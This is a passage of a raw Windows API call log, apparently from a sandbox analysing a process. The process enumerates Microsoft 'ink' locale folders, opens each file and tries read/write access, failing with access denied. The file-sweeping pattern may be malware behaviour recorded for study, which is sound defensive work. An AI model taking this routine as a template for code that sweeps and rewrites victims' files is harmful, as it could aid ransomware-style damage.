ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0085.512] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0085.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.513] AreFileApisANSI () returned 1 [0085.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT", lpUsedDefaultChar=0x0) returned 57 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.513] AreFileApisANSI () returned 1 [0085.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 57 [0085.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.514] GetLastError () returned 0x5 [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.514] AreFileApisANSI () returned 1 [0085.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 57 [0085.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.514] GetLastError () returned 0x5 [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] GetLastError () returned 0x5 [0085.514] SetLastError (dwErrCode=0x5) [0085.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0085.515] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0085.515] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0085.515] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.515] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.516] AreFileApisANSI () returned 1 [0085.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.516] AreFileApisANSI () returned 1 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 73 [0085.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.517] GetFileType (hFile=0x334) returned 0x1 [0085.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0085.517] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.517] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.517] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.517] CloseHandle (hObject=0x334) returned 1 [0085.517] AreFileApisANSI () returned 1 [0085.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0085.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 73 [0085.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.518] GetLastError () returned 0x5 [0085.518] GetLastError () returned 0x5 [0085.518] SetLastError (dwErrCode=0x5) [0085.518] GetLastError () returned 0x5 [0085.518] SetLastError (dwErrCode=0x5) [0085.518] GetLastError () returned 0x5 [0085.518] SetLastError (dwErrCode=0x5) [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0085.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.518] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0085.518] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0085.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0085.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0085.519] AreFileApisANSI () returned 1 [0085.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO", lpUsedDefaultChar=0x0) returned 57 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.519] AreFileApisANSI () returned 1 [0085.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 57 [0085.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.520] GetLastError () returned 0x5 [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.520] AreFileApisANSI () returned 1 [0085.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.520] RtlAllocateHeap (HeapHandle=0x20000, 